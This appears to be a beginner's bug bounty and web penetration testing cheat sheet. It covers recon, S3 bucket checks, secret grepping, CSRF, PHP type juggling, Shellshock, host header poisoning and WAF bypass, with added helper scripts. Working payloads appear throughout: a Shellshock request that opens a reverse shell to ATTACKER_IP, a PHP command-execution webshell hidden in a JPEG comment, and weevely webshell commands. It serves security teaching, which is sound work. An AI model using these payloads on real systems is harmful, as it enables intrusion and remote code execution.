Web Penetration Testing 101: A Beginner's Guide into Bug Bounty Programs

A comprehensive guide for students on penetration testing, covering topics such as Linux, web penetration testing, Active Directory, and cryptography.



  1. Enumerate domains.
  2. Enumerate subdomains: recon.sh + httpx, or knockpy -w subdomains $domain.com.
  3. Enumerate parameters: gau, waybackurls, paramspider and dirsearch.
  4. Enumerate open ports on each subdomain: nmap.
  5. API keys in JavaScript files: cat url.txt | grep "\.js" | xargs -I@ sh -c 'python3 SecretFinder.py -i @ -e -o cli' | tee apiKeys.txt
  6. Maltego + FOCA.
  7. Google Dorks.
  8. Fingerprint frameworks, languages, PaaS and servers.
  9. Shodan to check exposure to known CVEs.

Recon: strings to grep for in the JavaScript files, since they mark where requests are built and where URLs are hard-coded:


  1. setRequestHeader
  2. XMLHttpRequest
  3. $.ajax
  4. $.get
  5. $.post
  6. $.getJSON
  7. fetch(
  8. axios({
  9. Url = "http


Also worth grepping for (cookie handling and encoded values):

  1. set_cookie(
  2. base64

S3 Buckets

  • Look for s3.amazonaws.com hostnames (and CNAMEs pointing at them) in the recon output.
  • Read: aws s3 ls s3://domain --no-sign-request. If the name is not taken, the CLI answers: An error occurred (NoSuchBucket) when calling the ListObjectsV2 operation: The specified bucket does not exist. A listing means anonymous read is allowed; AccessDenied means the bucket exists but anonymous listing is blocked.
  • Upload: aws s3 cp poc.html s3://domain --no-sign-request. If the copy succeeds, anonymous write is allowed. Only do this when the program's rules permit it, and delete the proof file afterwards.
  • Bruteforce: cat subdomains.txt | xargs -I@ sh -c 'aws s3 ls s3://@ --no-sign-request 2>&1' | grep -v 'An error occurred (NoSuchBucket) when calling the ListObjectsV2 operation: The specified bucket does not exist'
    The 2>&1 matters: the CLI prints errors on stderr, so without it the grep -v filters nothing.
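The bruteforce one-liner above only hides the "does not exist" case; everything else scrolls past mixed together. The added script below (not from the original page or the linked repository) separates the outcomes a practitioner cares about and generates candidate names from a domain. The suffix list in bucket_candidates is an assumption, not something the page specifies; check_bucket and scan_buckets need the aws CLI and network access, the other two functions run offline.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): classify the result of an unauthenticated
# `aws s3 ls` so a bucket scan only reports names that actually exist.

# classify_s3_output OUTPUT: OUTPUT is the combined stdout+stderr of
#   aws s3 ls s3://NAME --no-sign-request
# Prints one word: missing | denied | listable | other
classify_s3_output() {
  local out="$1"
  case "$out" in
    *NoSuchBucket*)        echo "missing" ;;   # name is free: nothing to report
    *AccessDenied*|*AllAccessDisabled*)
                           echo "denied" ;;    # bucket exists, anonymous listing blocked
    "")                    echo "listable" ;;  # empty bucket, listing permitted
    *"An error occurred"*) echo "other" ;;     # e.g. PermanentRedirect: check the region by hand
    *)                     echo "listable" ;;  # object lines came back: anonymous read works
  esac
}

# bucket_candidates DOMAIN: derive bucket names to try from a domain (assumed suffix list)
bucket_candidates() {
  local domain="$1" base="${1%%.*}" suffix
  printf '%s\n' "$domain" "$base"
  for suffix in backup backups dev staging prod static assets uploads media logs; do
    printf '%s-%s\n%s.%s\n' "$base" "$suffix" "$base" "$suffix"
  done
}

# check_bucket NAME: run the unauthenticated listing and classify it (needs aws CLI and network)
check_bucket() {
  local name="$1" out
  out=$(aws s3 ls "s3://$name" --no-sign-request 2>&1 || true)
  printf '%s %s\n' "$name" "$(classify_s3_output "$out")"
}

# scan_buckets: read candidate names on stdin, print every bucket that exists (denied or listable)
scan_buckets() {
  local name line
  while IFS= read -r name; do
    [ -n "$name" ] || continue
    line=$(check_bucket "$name")
    case "$line" in *" missing") ;; *) printf '%s\n' "$line" ;; esac
  done
}

# Usage (network): bucket_candidates example.com | scan_buckets
```

A "denied" result is still worth recording: the bucket belongs to someone, and a later test with a valid AWS identity (any account, not just the target's) often lists what anonymous access cannot.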

API Tokens: key prefixes to grep for in JavaScript and responses:

  1. pk_live (Stripe publishable key; expected in client-side code)
  2. sk_live (Stripe secret key; must never appear client-side)
  3. AIza (Google API key)
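The two grep lists above (request/URL patterns and key prefixes) are easiest to apply with a small wrapper. The script below is an added example, not code from the original page or the linked repository: the pattern strings are the page's, while the key tails (alphanumeric Stripe bodies, 39-character Google keys) and the sample JavaScript with its fake keys are assumptions constructed for the demonstration. scan_js_urls needs network access; everything else runs offline against the constructed sample.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): pull request endpoints and key-looking strings
# out of JavaScript files using the patterns from the recon lists above.

# Request-issuing APIs, URL assignments, cookie and base64 handling (the page's list)
ENDPOINT_PATTERNS='setRequestHeader|XMLHttpRequest|\$\.ajax|\$\.get|\$\.post|\$\.getJSON|fetch\(|axios\(\{|[Uu]rl *= *"http|set_cookie\(|base64'
# Key prefixes from the page with an assumed body shape
TOKEN_PATTERNS='pk_live_[0-9A-Za-z]+|sk_live_[0-9A-Za-z]+|AIza[0-9A-Za-z_-]{35}'

# grep_endpoints FILE: numbered lines that build or send requests; read these to map the API
grep_endpoints() { grep -nE "$ENDPOINT_PATTERNS" "$1"; }

# extract_urls FILE: quoted absolute URLs and relative paths containing "api", de-duplicated
extract_urls() {
  grep -oE '"(https?://[^"]+|/[A-Za-z0-9_./?=&-]*api[A-Za-z0-9_./?=&-]*)"' "$1" | tr -d '"' | LC_ALL=C sort -u
}

# extract_tokens FILE: candidate live keys; an sk_live_ key in client-side JS is a finding on its own
extract_tokens() { grep -oE "$TOKEN_PATTERNS" "$1" | LC_ALL=C sort -u; }

# scan_js_urls: read URLs on stdin, fetch the *.js ones and run both extractors (network)
scan_js_urls() {
  local u tmp
  while IFS= read -r u; do
    case "$u" in *.js|*.js\?*) ;; *) continue ;; esac
    tmp=$(mktemp)
    if curl -sfL "$u" -o "$tmp"; then
      printf '== %s\n' "$u"; extract_urls "$tmp"; extract_tokens "$tmp"
    fi
    rm -f "$tmp"
  done
}

# Constructed sample JS (all keys are fake) so the extractors can be exercised offline
SAMPLE_JS=$(mktemp)
cat > "$SAMPLE_JS" <<'EOF'
const API = "https://api.example.com/v1";
var url = "http://legacy.example.com/old";
fetch(API + "/users", { headers: { "Authorization": "Bearer " + token } });
axios({ method: "post", url: "/internal/api/admin/export" });
$.getJSON("/api/search?q=" + q);
const stripe = Stripe("pk_live_51Hxxxxxxxxxxxxxxxxxxxxxx");
const secret = "sk_live_9zzzzzzzzzzzzzzzzzzzzz";
const maps = "AIzaSyDUMMYDUMMYDUMMYDUMMYDUMMYDUMMYDUM";
EOF

# Usage: grep_endpoints "$SAMPLE_JS"; extract_urls "$SAMPLE_JS"; extract_tokens "$SAMPLE_JS"
#        cat url.txt | scan_js_urls
```

The relative-path pattern only keeps paths containing "api"; widen the character class or drop that filter if the target uses a different routing prefix. A matched key is a candidate until it is validated against the vendor's API, and a publishable pk_live key alone is normally not a finding.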


JSON Web Tokens are rarely covered by automated scanners, so testing them by hand is more likely to turn up bugs.

Open Redirect

Use Burp Suite's "Search" on the proxy history to find redirect parameters and the responses that reflect them.



List the forms that change the password or email or delete the account and check whether they work via a GET request + submit input. If the action is accepted over GET without a CSRF token, an attacker-controlled page can trigger it for a logged-in victim:

<iframe src="$url?email=hacker@attacker-website.com"></iframe>

Type Juggling

POST https://example.com/login.php HTTP/1.1
Accept: */*
Content-Type: application/json

Add [] to the password parameter (password[]=x in a form body, "password": [] in JSON) so PHP receives an array instead of a string. String functions such as strcmp() then return NULL, and a loose comparison like strcmp(...) == 0 is true for NULL, so the login check passes.

Shellshock Attack

POST https://example.com/session.cgi HTTP/1.1
Accept: */*
User-Agent: () { :; }; echo "pwned"

curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/

curl -s -X GET "http://localhost/cgi-bin/stats" -H "User-Agent: () { :; }; echo; /bin/bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1"

Replace ATTACKER_IP and PORT with your listener. The echo; before the command prints the blank line that terminates the CGI response headers, so the command's output comes back in the response body instead of the server failing with a 500; it is not a WAF bypass.
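Why a User-Agent header reaches bash at all is easiest to see by reproducing the CGI hand-off locally. The script below is an added example, not from the original page or the linked repository: it sets HTTP_USER_AGENT the way a CGI server does before exec'ing the handler, runs a child bash, and reports whether the trailing command executed. probe_cgi wraps the curl probes shown above and needs network access and an in-scope target; the rest runs offline.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): reproduce the CGI hand-off locally.
# A CGI server copies request headers into the environment (User-Agent becomes HTTP_USER_AGENT)
# and then execs the handler; a vulnerable bash imports any env var whose value starts with "() {"
# as a function definition and also executes whatever follows the closing brace.

SHELLSHOCK_MARKER='SHELLSHOCKED'
SHELLSHOCK_PAYLOAD="() { :; }; echo $SHELLSHOCK_MARKER"

# shellshock_env_check: pass the payload to a child bash the way a CGI server would.
# Prints vulnerable | patched | no-bash. Covers CVE-2014-6271 only, not the follow-up parser bugs.
shellshock_env_check() {
  command -v bash >/dev/null 2>&1 || { echo "no-bash"; return 0; }
  local out
  out=$(env "HTTP_USER_AGENT=$SHELLSHOCK_PAYLOAD" bash -c 'true' 2>/dev/null || true)
  case "$out" in
    *"$SHELLSHOCK_MARKER"*) echo "vulnerable" ;;
    *)                      echo "patched" ;;
  esac
}

# cgi_payload CMD: header value for the curl probes above. The `echo;` is what makes the output
# visible: a CGI script must print a blank line to end the HTTP headers, otherwise the server
# answers 500 and the command output is lost. It is not a WAF bypass.
cgi_payload() { printf '() { :; }; echo; %s' "$1"; }

# probe_cgi URL CMD: send the payload in User-Agent (network; in-scope targets only)
probe_cgi() { curl -s -H "User-Agent: $(cgi_payload "$2")" "$1"; }

# Usage: shellshock_env_check
#        probe_cgi http://target/cgi-bin/stats 'id'
```

Any header the server exports is usable, not just User-Agent: Referer, Cookie and custom headers end up as HTTP_* variables the same way, which is why a WAF rule on one header name is not a fix.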


CRLF Injection

Always test parameters via GET requests as well; payload list: https://github.com/AngelJuanMa/Web-Vulnerabilities/blob/main/Payloads/CRLF.txt

Google Dorks

python3.9 pagodo.py -d example.com -g ./dorks/all_google_dorks.txt
cat pagodo.py.log | grep 'Found unique URL #'

Running the full dork list takes about 4.2 days.

Host Header Attack

POST https://example.com/reset.php HTTP/1.1
Accept: */*
Content-Type: application/json
Host: SUBDOMAIN.burpcollaborator.net

If the application builds the password-reset link from the Host header, the victim's reset token is sent to SUBDOMAIN.burpcollaborator.net instead of the real site. When Host is validated, try X-Forwarded-Host as well.

Subdomain Takeover


API keys



InQL (Burp Suite extension) to enumerate GraphQL queries and mutations from the introspection schema.

WAF bypass

Find the origin IP behind the WAF/CDN from historical DNS records and send requests to it directly:

sudo apt install jq
git clone https://github.com/vincentcox/bypass-firewalls-by-DNS-history
cd bypass-firewalls-by-DNS-history/
bash bypass-firewalls-by-DNS-history.sh --help


Webshell upload via image

weevely generate 12345 404.php
weevely http://domain.com/404.php 12345

jhead -purejpg ns.jpg    (strip all metadata from the image)
jhead -ce ns.jpg         (opens an editor on the JPEG comment field: paste the PHP payload there)
mv ns.jpg ns.php.jpg     (double extension, for servers that hand *.php.* files to the PHP handler)

Minimal payload that still shows the picture when no cmd parameter is supplied:

<style>body{font-size: 0;}h1{font-size: 12px}</style><h1>
<?php if(isset($_REQUEST['cmd'])){system($_REQUEST['cmd']);}else{echo '<img src="foto.jpg" border=0>';} ?>


Source: github.com/AngelJuanMa/Pentesting

About the Author

Ordinary People
